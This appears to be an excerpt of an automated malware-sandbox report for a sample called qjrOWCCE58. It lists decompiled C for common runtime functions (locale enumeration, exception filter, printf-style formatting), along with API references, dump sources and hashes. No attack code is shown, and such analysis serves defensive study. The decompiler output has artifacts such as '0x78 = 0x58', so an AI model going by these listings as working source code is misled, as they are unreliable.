			E00425811(void* __ecx, void* __edx, void* __eflags, signed char* _a4) {
				void* __ebp;
				intOrPtr _t9;
				signed char* _t13;
				intOrPtr* _t15;
				void* _t19;
				void* _t21;

				_t19 = E0041B333(__ecx, __edx);
				_t15 =  *((intOrPtr*)(_t19 + 0x54));
				_t21 = _t15 + 2;
				do {
					_t9 =  *_t15;
					_t15 = _t15 + 2;
				} while (_t9 != 0);
				 *(_t19 + 0x64) = 0 | _t15 - _t21 >> 0x00000001 == 0x00000003;
				EnumSystemLocalesW(0x42576a, 1);
				_t13 = _a4;
				if(( *_t13 & 0x00000004) == 0) {
					 *_t13 = 0;
					return _t13;
				}
				return _t13;
			}

0x0042581d
0x00425821
0x00425824
0x00425827
0x00425827
0x0042582a
0x0042582d
0x00425845
0x00425848
0x0042584e
0x00425854
0x00425856
0x00000000
0x00425856
0x0042585b

APIs

Part of subcall function 0041B333: GetLastError.KERNEL32(00401A78,?,00401A7C,00411E51,?,00401A78,761B5970,?,0041B5E3,00000000,761B5970,00000000,00000000,00401A78), ref: 0041B338
Part of subcall function 0041B333: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0041B5E3,00000000,761B5970,00000000,00000000,00401A78), ref: 0041B3D6

EnumSystemLocalesW.KERNEL32(0042576A,00000001,00000000,?,?,00425FD2,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 00425848

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: f46397b64aa654c1cf2ced8dabfde9e55cd0677f3c75a02ed604cf036187773a
Instruction ID: 20082ef7100bac361f1ee290f8fa82beaf4f603209a93820407bf56a01033f43
Opcode Fuzzy Hash: f46397b64aa654c1cf2ced8dabfde9e55cd0677f3c75a02ed604cf036187773a
Instruction Fuzzy Hash: 53F05C3530020597CB14AF35E84576B7F50EFC1710F86805EEE09CB250C6B59883C794

Uniqueness

Uniqueness Score: -1.00%

Function 00845A78 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0083B59A: GetLastError.KERNEL32(00821CDF,?,00821CE3,008320B8,?,00821CDF,0042C0B4,?,0083B84A,00000000,0042C0B4,00000000,00000000,00821CDF), ref: 0083B59F
Part of subcall function 0083B59A: SetLastError.KERNEL32(00000000,0043B1C8,000000FF,?,0083B84A,00000000,0042C0B4,00000000,00000000,00821CDF), ref: 0083B63D

EnumSystemLocalesW.KERNEL32(0042576A,00000001,00000000,?,?,00846239,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 00845AAF

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: f46397b64aa654c1cf2ced8dabfde9e55cd0677f3c75a02ed604cf036187773a
Instruction ID: 14a70784eff2884ee87c186ed102684b184c8ee70b0d669d035ed469566d396c
Opcode Fuzzy Hash: f46397b64aa654c1cf2ced8dabfde9e55cd0677f3c75a02ed604cf036187773a
Instruction Fuzzy Hash: 0EF0E53A34021997CB14AF39D89566ABF94FFC1710F4A8059EA05CB651C675D883C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0041CFF1 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,0041AA8E,?,20001004,00000000,00000002,?,?,0041A09B), ref: 0041D025

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: f42da960ac960bc774b5a27a6ccb3ed2396e53eb330b489d1d21cbee63b4093d
Instruction ID: 3a6245240742d99d223290a821991cde0f33d5289c971d618968a2a4d4e69df5
Opcode Fuzzy Hash: f42da960ac960bc774b5a27a6ccb3ed2396e53eb330b489d1d21cbee63b4093d
Instruction Fuzzy Hash: 6FE04F71A40118BBCF222F61DC45EEE3F15EF48750F044426FC0566261CB759DA3AAD9

Uniqueness

Uniqueness Score: -1.00%

Function 0083D258 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,0083ACF5,?,20001004,00000000,00000002,?,?,0083A302), ref: 0083D28C

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: acb1b5927a8ff0eec792e2177407b25d07d9a2e8ef7b689c9390fe66958efd16
Instruction ID: 40cc5a28967243ed2959fcf17eaa0a9d1838dcfba3de9dba26ca9cc82347b2ee
Opcode Fuzzy Hash: acb1b5927a8ff0eec792e2177407b25d07d9a2e8ef7b689c9390fe66958efd16
Instruction Fuzzy Hash: A7E04F3550022CBBCF122F64EC05AAE3F19FF84750F448021FC05A6261CB729D22AAD5

Uniqueness

Uniqueness Score: -1.00%

Function 0040DF79 Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040DF79() {

				return SetUnhandledExceptionFilter(E0040DF85);
			}

0x0040df84

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0000DF85,0040DB17), ref: 0040DF7E

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 37ba474536df3b157338c2d6ae8ac252da403cbe7d3d1fbc6115ba824604cd04
Instruction ID: fc4c7a9d5a3809a041d6ee1b0896f65fd9b5fc90bdf34f6e29568c7a756ed26e
Opcode Fuzzy Hash: 37ba474536df3b157338c2d6ae8ac252da403cbe7d3d1fbc6115ba824604cd04
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0082E1E0 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(0040DF85,0082DD7E), ref: 0082E1E5

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 37ba474536df3b157338c2d6ae8ac252da403cbe7d3d1fbc6115ba824604cd04
Instruction ID: fc4c7a9d5a3809a041d6ee1b0896f65fd9b5fc90bdf34f6e29568c7a756ed26e
Opcode Fuzzy Hash: 37ba474536df3b157338c2d6ae8ac252da403cbe7d3d1fbc6115ba824604cd04
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 004138A3 Relevance: 1.5, Strings: 1, Instructions: 216
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E004138A3(intOrPtr* __ecx) {
				char _v6;
				char _v8;
				signed int _v12;
				void* __ebx;
				char _t51;
				signed int _t52;
				void* _t53;
				signed int _t54;
				signed char _t56;
				signed char _t58;
				signed int _t59;
				void* _t61;
				signed char _t66;
				signed char _t69;
				signed char _t76;
				signed char _t78;
				signed int _t80;
				signed int _t82;
				signed int _t83;
				unsigned int _t89;
				signed int _t90;
				signed int* _t91;
				void* _t93;
				signed int _t95;
				unsigned int _t97;
				signed char _t99;
				void* _t107;
				intOrPtr _t110;
				void* _t114;
				intOrPtr* _t117;
				void* _t119;
				void* _t120;
				void* _t122;
				void* _t123;

				_push(__ecx);
				_push(__ecx);
				_t117 = __ecx;
				_t93 = 0x58;
				_t51 =  *((char*)(__ecx + 0x31));
				_t122 = _t51 - 0x64;
				if(_t122 > 0) {
					__eflags = _t51 - 0x70;
					if(__eflags > 0) {
						_t52 = _t51 - 0x73;
						__eflags = _t52;
						if(_t52 == 0) {
							L9:
							_t53 = E004141D6(_t117);
							L10:
							if(_t53 != 0) {
								__eflags =  *(_t117 + 0x30);
								if( *(_t117 + 0x30) != 0) {
									L70:
									_t54 = 1;
									L71:
									return _t54;
								}
								_t95 = 0;
								_v8 = 0;
								_v6 = 0;
								_t89 =  *(_t117 + 0x20);
								_v12 = 0;
								_t56 = _t89 >> 4;
								__eflags = 1 & _t56;
								if((1 & _t56) == 0) {
									L45:
									_t110 =  *((intOrPtr*)(_t117 + 0x31));
									__eflags = _t110 - 0x78;
									if(_t110 == 0x78) {
										L47:
										_t58 = _t89 >> 5;
										__eflags = _t58 & 0x00000001;
										if((_t58 & 0x00000001) == 0) {
											L49:
											_t90 = 0;
											__eflags = 0;
											L50:
											__eflags = _t110 - 0x61;
											if(_t110 == 0x61) {
												L53:
												_t59 = 1;
												L54:
												__eflags = _t90;
												if(_t90 != 0) {
													L56:
													 *((char*)(_t119 + _t95 - 4)) = 0x30;
													__eflags = _t110 - 0x58;
													if(_t110 == 0x58) {
														L59:
														0x78 = 0x58;
														L60:
														 *((char*)(_t119 + _t95 - 3)) = 0x78;
														_t95 = _t95 + 2;
														__eflags = _t95;
														_v12 = _t95;
														L61:
														_t91 = _t117 + 0x18;
														_t61 = _t117 + 0x448;
														_t114 =  *((intOrPtr*)(_t117 + 0x24)) -  *((intOrPtr*)(_t117 + 0x38)) - _t95;
														__eflags =  *(_t117 + 0x20) & 0x0000000c;
														if(( *(_t117 + 0x20) & 0x0000000c) == 0) {
															E00412E8A(_t61, 0x20, _t114, _t91);
															_t95 = _v12;
															_t120 = _t120 + 0x10;
														}
														_push(_t117 + 0xc);
														E004144CC(_t117 + 0x448,  &_v8, _t95, _t91);
														_t97 =  *(_t117 + 0x20);
														_t66 = _t97 >> 3;
														__eflags = _t66 & 0x00000001;
														if((_t66 & 0x00000001) != 0) {
															_t99 = _t97 >> 2;
															__eflags = _t99 & 0x00000001;
															if((_t99 & 0x00000001) == 0) {
																E00412E8A(_t117 + 0x448, 0x30, _t114, _t91);
																_t120 = _t120 + 0x10;
															}
														}
														E00414382(_t117, 0);
														__eflags =  *_t91;
														if( *_t91 >= 0) {
															_t69 =  *(_t117 + 0x20) >> 2;
															__eflags = _t69 & 0x00000001;
															if((_t69 & 0x00000001) != 0) {
																E00412E8A(_t117 + 0x448, 0x20, _t114, _t91);
															}
														}
														goto L70;
													}
													__eflags = _t110 - 0x41;
													if(_t110 == 0x41) {
														goto L59;
													}
													goto L60;
												}
												__eflags = _t59;
												if(_t59 == 0) {
													goto L61;
												}
												goto L56;
											}
											__eflags = _t110 - 0x41;
											if(_t110 == 0x41) {
												goto L53;
											}
											_t59 = 0;
											goto L54;
										}
										_t90 = 1;
										goto L50;
									}
									__eflags = _t110 - 0x58;
									if(_t110 != 0x58) {
										goto L49;
									}
									goto L47;
								}
								_t76 = _t89 >> 6;
								__eflags = 1 & _t76;
								if((1 & _t76) == 0) {
									__eflags = 1 & _t89;
									if((1 & _t89) == 0) {
										_t78 = _t89 >> 1;
										__eflags = 1 & _t78;
										if((1 & _t78) != 0) {
											_v8 = 0x20;
											_t95 = 1;
											_v12 = 1;
										}
										goto L45;
									}
									_v8 = 0x2b;
									L42:
									_t95 = 1;
									_v12 = 1;
									goto L45;
								}
								_v8 = 0x2d;
								goto L42;
							}
							L11:
							_t54 = 0;
							goto L71;
						}
						_t80 = _t52;
						__eflags = _t80;
						if(__eflags == 0) {
							L28:
							_push(0);
							_push(0xa);
							L29:
							_t53 = E00413FDA(_t117, _t107, __eflags);
							goto L10;
						}
						__eflags = _t80 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t53 = E004141BE(__ecx);
						goto L10;
					}
					__eflags = _t51 - 0x67;
					if(_t51 <= 0x67) {
						L30:
						_t53 = E00413DF6(0, _t117);
						goto L10;
					}
					__eflags = _t51 - 0x69;
					if(_t51 == 0x69) {
						L27:
						_t2 = _t117 + 0x20;
						 *_t2 =  *(_t117 + 0x20) | 0x00000010;
						__eflags =  *_t2;
						goto L28;
					}
					__eflags = _t51 - 0x6e;
					if(_t51 == 0x6e) {
						_t53 = E0041412B(__ecx, _t107);
						goto L10;
					}
					__eflags = _t51 - 0x6f;
					if(_t51 != 0x6f) {
						goto L11;
					}
					_t53 = E0041419F(__ecx);
					goto L10;
				}
				if(_t122 == 0) {
					goto L27;
				}
				_t123 = _t51 - _t93;
				if(_t123 > 0) {
					_t82 = _t51 - 0x5a;
					__eflags = _t82;
					if(_t82 == 0) {
						_t53 = E00413D9C(__ecx);
						goto L10;
					}
					_t83 = _t82 - 7;
					__eflags = _t83;
					if(_t83 == 0) {
						goto L30;
					}
					__eflags = _t83;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t53 = E00413F47(0, _t117, _t107, __eflags, 0);
					goto L10;
				}
				if(_t123 == 0) {
					_push(1);
					goto L13;
				}
				if(_t51 == 0x41) {
					goto L30;
				}
				if(_t51 == 0x43) {
					goto L17;
				}
				if(_t51 <= 0x44) {
					goto L11;
				}
				if(_t51 <= 0x47) {
					goto L30;
				}
				if(_t51 != 0x53) {
					goto L11;
				}
				goto L9;
			}

0x004138a8
0x004138a9
0x004138ac
0x004138b2
0x004138b3
0x004138b7
0x004138ba
0x00413928
0x0041392b
0x0041397a
0x0041397a
0x0041397d
0x004138e9
0x004138eb
0x004138f0
0x004138f2
0x00413998
0x0041399b
0x00413acf
0x00413acf
0x00413ad1
0x00413ad4
0x00413ad4
0x004139a1
0x004139a3
0x004139a7
0x004139ac
0x004139b2
0x004139b5
0x004139b8
0x004139ba
0x004139eb
0x004139eb
0x004139ee
0x004139f1
0x004139f8
0x004139fa
0x004139fd
0x004139ff
0x00413a05
0x00413a05
0x00413a05
0x00413a07
0x00413a07
0x00413a0a
0x00413a15
0x00413a15
0x00413a17
0x00413a17
0x00413a19
0x00413a1f
0x00413a1f
0x00413a24
0x00413a27
0x00413a32
0x00413a34
0x00413a35
0x00413a35
0x00413a39
0x00413a39
0x00413a3c
0x00413a3f
0x00413a43
0x00413a49
0x00413a4f
0x00413a51
0x00413a55
0x00413a5c
0x00413a61
0x00413a64
0x00413a64
0x00413a6a
0x00413a77
0x00413a7c
0x00413a81
0x00413a84
0x00413a86
0x00413a88
0x00413a8b
0x00413a8e
0x00413a9b
0x00413aa0
0x00413aa0
0x00413a8e
0x00413aa7
0x00413aac
0x00413aaf
0x00413ab4
0x00413ab7
0x00413ab9
0x00413ac6
0x00413acb
0x00413ab9
0x00000000
0x00413ace
0x00413a29
0x00413a2c
0x00000000
0x00000000
0x00000000
0x00413a2e
0x00413a1b
0x00413a1d
0x00000000
0x00000000
0x00000000
0x00413a1d
0x00413a0c
0x00413a0f
0x00000000
0x00000000
0x00413a11
0x00000000
0x00413a11
0x00413a01
0x00000000
0x00413a01
0x004139f3
0x004139f6
0x00000000
0x00000000
0x00000000
0x004139f6
0x004139be
0x004139c1
0x004139c3
0x004139cb
0x004139cd
0x004139dc
0x004139de
0x004139e0
0x004139e2
0x004139e6
0x004139e8
0x004139e8
0x00000000
0x004139e0
0x004139cf
0x004139d3
0x004139d3
0x004139d5
0x00000000
0x004139d5
0x004139c5
0x00000000
0x004139c5
0x004138f8
0x004138f8
0x00000000
0x004138f8
0x00413984
0x00413984
0x00413987
0x00413959
0x00413959
0x0041395a
0x0041395c
0x0041395e
0x00000000
0x0041395e
0x00413989
0x0041398c
0x00000000
0x00000000
0x00413992
0x00413901
0x00413901
0x00000000
0x00413901
0x0041392d
0x00413970
0x00000000
0x00413970
0x0041392f
0x00413932
0x00413965
0x00413967
0x00000000
0x00413967
0x00413934
0x00413937
0x00413955
0x00413955
0x00413955
0x00413955
0x00000000
0x00413955
0x00413939
0x0041393c
0x0041394e
0x00000000
0x0041394e
0x0041393e
0x00413941
0x00000000
0x00000000
0x00413945
0x00000000
0x00413945
0x004138bc
0x00000000
0x00000000
0x004138c2
0x004138c4
0x00413905
0x00413905
0x00413908
0x00413921
0x00000000
0x00413921
0x0041390a
0x0041390a
0x0041390d
0x00000000
0x00000000
0x00413910
0x00413913
0x00000000
0x00000000
0x00413915
0x00413918
0x00000000
0x00413918
0x004138c6
0x004138ff
0x00000000
0x004138ff
0x004138cb
0x00000000
0x00000000
0x004138d4
0x00000000
0x00000000
0x004138d9
0x00000000
0x00000000
0x004138de
0x00000000
0x00000000
0x004138e7
0x00000000
0x00000000
0x00000000

Strings

0, xrefs: 00413A1F

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: e50db9d2febd3e1b1e4ee87c6fd46fc9ab174e20af13cbd46d18f4a821cdbe6f
Instruction ID: 83fe90da8a0081b9378041a85b31bb2df3c704e502dc108b5d203341a1c84133
Opcode Fuzzy Hash: e50db9d2febd3e1b1e4ee87c6fd46fc9ab174e20af13cbd46d18f4a821cdbe6f
Instruction Fuzzy Hash: 255149B06147496ADB389E2984967FF6B999F02346F18041FF482D7382C69D9FC6831E

Uniqueness

Uniqueness Score: -1.00%

Function 00413AD5 Relevance: 1.5, Strings: 1, Instructions: 216
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E00413AD5(intOrPtr* __ecx) {
				char _v6;
				char _v8;
				signed int _v12;
				void* __ebx;
				char _t51;
				signed int _t52;
				void* _t53;
				signed int _t54;
				signed char _t56;
				signed char _t58;
				signed int _t59;
				void* _t61;
				signed char _t66;
				signed char _t69;
				signed char _t76;
				signed char _t78;
				signed int _t80;
				signed int _t82;
				signed int _t83;
				unsigned int _t89;
				signed int _t90;
				signed int* _t91;
				void* _t93;
				signed int _t95;
				unsigned int _t97;
				signed char _t99;
				void* _t107;
				intOrPtr _t110;
				void* _t114;
				intOrPtr* _t117;
				void* _t119;
				void* _t120;
				void* _t122;
				void* _t123;

				_push(__ecx);
				_push(__ecx);
				_t117 = __ecx;
				_t93 = 0x58;
				_t51 =  *((char*)(__ecx + 0x31));
				_t122 = _t51 - 0x64;
				if(_t122 > 0) {
					__eflags = _t51 - 0x70;
					if(__eflags > 0) {
						_t52 = _t51 - 0x73;
						__eflags = _t52;
						if(_t52 == 0) {
							L9:
							_t53 = E004141D6(_t117);
							L10:
							if(_t53 != 0) {
								__eflags =  *(_t117 + 0x30);
								if( *(_t117 + 0x30) != 0) {
									L70:
									_t54 = 1;
									L71:
									return _t54;
								}
								_t95 = 0;
								_v8 = 0;
								_v6 = 0;
								_t89 =  *(_t117 + 0x20);
								_v12 = 0;
								_t56 = _t89 >> 4;
								__eflags = 1 & _t56;
								if((1 & _t56) == 0) {
									L45:
									_t110 =  *((intOrPtr*)(_t117 + 0x31));
									__eflags = _t110 - 0x78;
									if(_t110 == 0x78) {
										L47:
										_t58 = _t89 >> 5;
										__eflags = _t58 & 0x00000001;
										if((_t58 & 0x00000001) == 0) {
											L49:
											_t90 = 0;
											__eflags = 0;
											L50:
											__eflags = _t110 - 0x61;
											if(_t110 == 0x61) {
												L53:
												_t59 = 1;
												L54:
												__eflags = _t90;
												if(_t90 != 0) {
													L56:
													 *((char*)(_t119 + _t95 - 4)) = 0x30;
													__eflags = _t110 - 0x58;
													if(_t110 == 0x58) {
														L59:
														0x78 = 0x58;
														L60:
														 *((char*)(_t119 + _t95 - 3)) = 0x78;
														_t95 = _t95 + 2;
														__eflags = _t95;
														_v12 = _t95;
														L61:
														_t91 = _t117 + 0x18;
														_t61 = _t117 + 0x448;
														_t114 =  *((intOrPtr*)(_t117 + 0x24)) -  *((intOrPtr*)(_t117 + 0x38)) - _t95;
														__eflags =  *(_t117 + 0x20) & 0x0000000c;
														if(( *(_t117 + 0x20) & 0x0000000c) == 0) {
															E00412EC5(_t61, 0x20, _t114, _t91);
															_t95 = _v12;
															_t120 = _t120 + 0x10;
														}
														_push(_t117 + 0xc);
														E004144F8(_t117 + 0x448,  &_v8, _t95, _t91);
														_t97 =  *(_t117 + 0x20);
														_t66 = _t97 >> 3;
														__eflags = _t66 & 0x00000001;
														if((_t66 & 0x00000001) != 0) {
															_t99 = _t97 >> 2;
															__eflags = _t99 & 0x00000001;
															if((_t99 & 0x00000001) == 0) {
																E00412EC5(_t117 + 0x448, 0x30, _t114, _t91);
																_t120 = _t120 + 0x10;
															}
														}
														E00414427(_t117, _t110, 0);
														__eflags =  *_t91;
														if( *_t91 >= 0) {
															_t69 =  *(_t117 + 0x20) >> 2;
															__eflags = _t69 & 0x00000001;
															if((_t69 & 0x00000001) != 0) {
																E00412EC5(_t117 + 0x448, 0x20, _t114, _t91);
															}
														}
														goto L70;
													}
													__eflags = _t110 - 0x41;
													if(_t110 == 0x41) {
														goto L59;
													}
													goto L60;
												}
												__eflags = _t59;
												if(_t59 == 0) {
													goto L61;
												}
												goto L56;
											}
											__eflags = _t110 - 0x41;
											if(_t110 == 0x41) {
												goto L53;
											}
											_t59 = 0;
											goto L54;
										}
										_t90 = 1;
										goto L50;
									}
									__eflags = _t110 - 0x58;
									if(_t110 != 0x58) {
										goto L49;
									}
									goto L47;
								}
								_t76 = _t89 >> 6;
								__eflags = 1 & _t76;
								if((1 & _t76) == 0) {
									__eflags = 1 & _t89;
									if((1 & _t89) == 0) {
										_t78 = _t89 >> 1;
										__eflags = 1 & _t78;
										if((1 & _t78) != 0) {
											_v8 = 0x20;
											_t95 = 1;
											_v12 = 1;
										}
										goto L45;
									}
									_v8 = 0x2b;
									L42:
									_t95 = 1;
									_v12 = 1;
									goto L45;
								}
								_v8 = 0x2d;
								goto L42;
							}
							L11:
							_t54 = 0;
							goto L71;
						}
						_t80 = _t52;
						__eflags = _t80;
						if(__eflags == 0) {
							L28:
							_push(0);
							_push(0xa);
							L29:
							_t53 = E00413FDA(_t117, _t107, __eflags);
							goto L10;
						}
						__eflags = _t80 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t53 = E004141BE(__ecx);
						goto L10;
					}
					__eflags = _t51 - 0x67;
					if(_t51 <= 0x67) {
						L30:
						_t53 = E00413DF6(0, _t117);
						goto L10;
					}
					__eflags = _t51 - 0x69;
					if(_t51 == 0x69) {
						L27:
						_t2 = _t117 + 0x20;
						 *_t2 =  *(_t117 + 0x20) | 0x00000010;
						__eflags =  *_t2;
						goto L28;
					}
					__eflags = _t51 - 0x6e;
					if(_t51 == 0x6e) {
						_t53 = E0041412B(__ecx, _t107);
						goto L10;
					}
					__eflags = _t51 - 0x6f;
					if(_t51 != 0x6f) {
						goto L11;
					}
					_t53 = E0041419F(__ecx);
					goto L10;
				}
				if(_t122 == 0) {
					goto L27;
				}
				_t123 = _t51 - _t93;
				if(_t123 > 0) {
					_t82 = _t51 - 0x5a;
					__eflags = _t82;
					if(_t82 == 0) {
						_t53 = E00413D9C(__ecx);
						goto L10;
					}
					_t83 = _t82 - 7;
					__eflags = _t83;
					if(_t83 == 0) {
						goto L30;
					}
					__eflags = _t83;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t53 = E00413F47(0, _t117, _t107, __eflags, 0);
					goto L10;
				}
				if(_t123 == 0) {
					_push(1);
					goto L13;
				}
				if(_t51 == 0x41) {
					goto L30;
				}
				if(_t51 == 0x43) {
					goto L17;
				}
				if(_t51 <= 0x44) {
					goto L11;
				}
				if(_t51 <= 0x47) {
					goto L30;
				}
				if(_t51 != 0x53) {
					goto L11;
				}
				goto L9;
			}

0x00413ada
0x00413adb
0x00413ade
0x00413ae4
0x00413ae5
0x00413ae9
0x00413aec
0x00413b5a
0x00413b5d
0x00413bac
0x00413bac
0x00413baf
0x00413b1b
0x00413b1d
0x00413b22
0x00413b24
0x00413bca
0x00413bcd
0x00413d01
0x00413d01
0x00413d03
0x00413d06
0x00413d06
0x00413bd3
0x00413bd5
0x00413bd9
0x00413bde
0x00413be4
0x00413be7
0x00413bea
0x00413bec
0x00413c1d
0x00413c1d
0x00413c20
0x00413c23
0x00413c2a
0x00413c2c
0x00413c2f
0x00413c31
0x00413c37
0x00413c37
0x00413c37
0x00413c39
0x00413c39
0x00413c3c
0x00413c47
0x00413c47
0x00413c49
0x00413c49
0x00413c4b
0x00413c51
0x00413c51
0x00413c56
0x00413c59
0x00413c64
0x00413c66
0x00413c67
0x00413c67
0x00413c6b
0x00413c6b
0x00413c6e
0x00413c71
0x00413c75
0x00413c7b
0x00413c81
0x00413c83
0x00413c87
0x00413c8e
0x00413c93
0x00413c96
0x00413c96
0x00413c9c
0x00413ca9
0x00413cae
0x00413cb3
0x00413cb6
0x00413cb8
0x00413cba
0x00413cbd
0x00413cc0
0x00413ccd
0x00413cd2
0x00413cd2
0x00413cc0
0x00413cd9
0x00413cde
0x00413ce1
0x00413ce6
0x00413ce9
0x00413ceb
0x00413cf8
0x00413cfd
0x00413ceb
0x00000000
0x00413d00
0x00413c5b
0x00413c5e
0x00000000
0x00000000
0x00000000
0x00413c60
0x00413c4d
0x00413c4f
0x00000000
0x00000000
0x00000000
0x00413c4f
0x00413c3e
0x00413c41
0x00000000
0x00000000
0x00413c43
0x00000000
0x00413c43
0x00413c33
0x00000000
0x00413c33
0x00413c25
0x00413c28
0x00000000
0x00000000
0x00000000
0x00413c28
0x00413bf0
0x00413bf3
0x00413bf5
0x00413bfd
0x00413bff
0x00413c0e
0x00413c10
0x00413c12
0x00413c14
0x00413c18
0x00413c1a
0x00413c1a
0x00000000
0x00413c12
0x00413c01
0x00413c05
0x00413c05
0x00413c07
0x00000000
0x00413c07
0x00413bf7
0x00000000
0x00413bf7
0x00413b2a
0x00413b2a
0x00000000
0x00413b2a
0x00413bb6
0x00413bb6
0x00413bb9
0x00413b8b
0x00413b8b
0x00413b8c
0x00413b8e
0x00413b90
0x00000000
0x00413b90
0x00413bbb
0x00413bbe
0x00000000
0x00000000
0x00413bc4
0x00413b33
0x00413b33
0x00000000
0x00413b33
0x00413b5f
0x00413ba2
0x00000000
0x00413ba2
0x00413b61
0x00413b64
0x00413b97
0x00413b99
0x00000000
0x00413b99
0x00413b66
0x00413b69
0x00413b87
0x00413b87
0x00413b87
0x00413b87
0x00000000
0x00413b87
0x00413b6b
0x00413b6e
0x00413b80
0x00000000
0x00413b80
0x00413b70
0x00413b73
0x00000000
0x00000000
0x00413b77
0x00000000
0x00413b77
0x00413aee
0x00000000
0x00000000
0x00413af4
0x00413af6
0x00413b37
0x00413b37
0x00413b3a
0x00413b53
0x00000000
0x00413b53
0x00413b3c
0x00413b3c
0x00413b3f
0x00000000
0x00000000
0x00413b42
0x00413b45
0x00000000
0x00000000
0x00413b47
0x00413b4a
0x00000000
0x00413b4a
0x00413af8
0x00413b31
0x00000000
0x00413b31
0x00413afd
0x00000000
0x00000000
0x00413b06
0x00000000
0x00000000
0x00413b0b
0x00000000
0x00000000
0x00413b10
0x00000000
0x00000000
0x00413b19
0x00000000
0x00000000
0x00000000

Strings

0, xrefs: 00413C51

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 1476618c8e66f56a198274a85053ba7ae76a271cc52a9967f3c16d55a5b0da1c
Instruction ID: 993fcedf57cc3f2cfade75f4c86af19d37b5563699985fcc2da173bababb2f33
Opcode Fuzzy Hash: 1476618c8e66f56a198274a85053ba7ae76a271cc52a9967f3c16d55a5b0da1c
Instruction Fuzzy Hash: C751567120864896DB388E28959A7FF679A9B4130AF14011FD442EB383F61DBFC5C25E

Uniqueness

Uniqueness Score: -1.00%

Function 00833B0A Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 00833C86

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: e50db9d2febd3e1b1e4ee87c6fd46fc9ab174e20af13cbd46d18f4a821cdbe6f
Instruction ID: 744e98a39fee6aba945204b588108db02c4bbf5fc776163286ee19ffd3081482
Opcode Fuzzy Hash: e50db9d2febd3e1b1e4ee87c6fd46fc9ab174e20af13cbd46d18f4a821cdbe6f
Instruction Fuzzy Hash: 55517D7020474C5BEF388A2C84967BEF799FFD1324F14151EE446E7282D615EF4A82D6

